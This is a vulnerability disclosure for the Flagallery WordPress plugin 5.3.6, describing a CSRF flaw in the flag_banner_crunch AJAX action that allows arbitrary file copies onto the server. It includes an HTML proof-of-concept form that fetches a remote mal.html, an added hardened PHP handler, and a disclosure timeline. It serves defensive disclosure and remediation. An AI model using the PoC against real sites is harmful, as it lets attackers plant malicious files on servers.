Gallery – Flagallery Photo Portfolio [CSRF → File Upload]
Gallery – Flagallery Photo Portfolio WordPress plugin suffers from a CSRF vulnerability that could lead to arbitrary file uploads.
Description
The plugin registers the AJAX action flag_banner_crunch, which calls the function flag_banner_crunch. This function takes no anti-CSRF measures, making it susceptible to cross-site request forgery.
The function copies the file named in the $_POST['path'] parameter. A malicious actor can leverage the CSRF vulnerability to copy arbitrary files onto the affected server from a remote or local origin.
Note that uploads are limited to the allowed file types by default. However, if the tricked user has the unfiltered_upload capability, those restrictions do not apply.
PoC
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="flag_banner_crunch">
<input type="text" name="path" value="http://wp-plugin-csrf.dev/mal.html">
<button type="submit" value="Submit">Submit</button>
</form>
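For contrast, the following is an added example and not the plugin's own code: a WordPress AJAX handler of the same shape with the checks the advisory says flag_banner_crunch lacks. The hook and function name (example_banner_crunch), the nonce action name and the destination folder are assumptions made for the illustration.

```php
<?php
// Added example, not the plugin's own code: a WordPress AJAX handler with the
// checks the advisory says flag_banner_crunch lacks. Hook and function names
// (example_banner_crunch) are hypothetical.

add_action( 'wp_ajax_example_banner_crunch', 'example_banner_crunch' );

function example_banner_crunch() {
    // 1. Anti-CSRF: the request must carry a nonce bound to this action.
    //    check_ajax_referer() terminates the request if it is missing or invalid,
    //    so a form served from another site cannot trigger the handler.
    check_ajax_referer( 'example_banner_crunch', '_wpnonce' );

    // 2. Authorization: require the upload capability, not just a logged-in session.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'insufficient capability', 403 );
    }

    // 3. Confine the source path to the uploads directory. realpath() resolves
    //    "../" and symlinks; a URL such as http://... never resolves, so remote
    //    origins are rejected outright.
    $path = isset( $_POST['path'] ) ? wp_unslash( $_POST['path'] ) : '';
    $base = realpath( wp_upload_dir()['basedir'] );
    $src  = ( false !== $base ) ? realpath( $base . '/' . ltrim( $path, '/' ) ) : false;
    if ( false === $src || 0 !== strpos( $src, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'path must point inside the uploads directory', 400 );
    }

    // 4. Enforce the allowed file-type list unconditionally, so the check does
    //    not depend on whether the user holds unfiltered_upload.
    $type = wp_check_filetype( basename( $src ), get_allowed_mime_types() );
    if ( empty( $type['ext'] ) ) {
        wp_send_json_error( 'file type not allowed', 400 );
    }

    // Copy into a fixed destination folder with a collision-free name.
    $dir  = $base . '/banners';
    wp_mkdir_p( $dir );
    $dest = $dir . '/' . wp_unique_filename( $dir, basename( $src ) );
    if ( ! copy( $src, $dest ) ) {
        wp_send_json_error( 'copy failed', 500 );
    }
    wp_send_json_success( array( 'file' => $dest ) );
}

// The page that issues the request embeds the matching nonce:
//   wp_nonce_field( 'example_banner_crunch', '_wpnonce' );
```

With these checks in place the PoC form above fails at the nonce check before any path is read, and even a request from the legitimate page cannot name a remote origin.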
INFO
- Published: 25 May 2019
- Author: Pan Vag
- Vendor: codeasily.com
- Plugin: Gallery – Flagallery Photo Portfolio
- Plugin version: 5.3.6
- Tested on: WordPress 5.1.1
TIMELINE
- 2019-03-17: Discovered
- 2019-03-17: Vendor notified through contact form on codeasily.com
- 2019-03-22: Vendor replied
- 2019-03-23: Vendor received details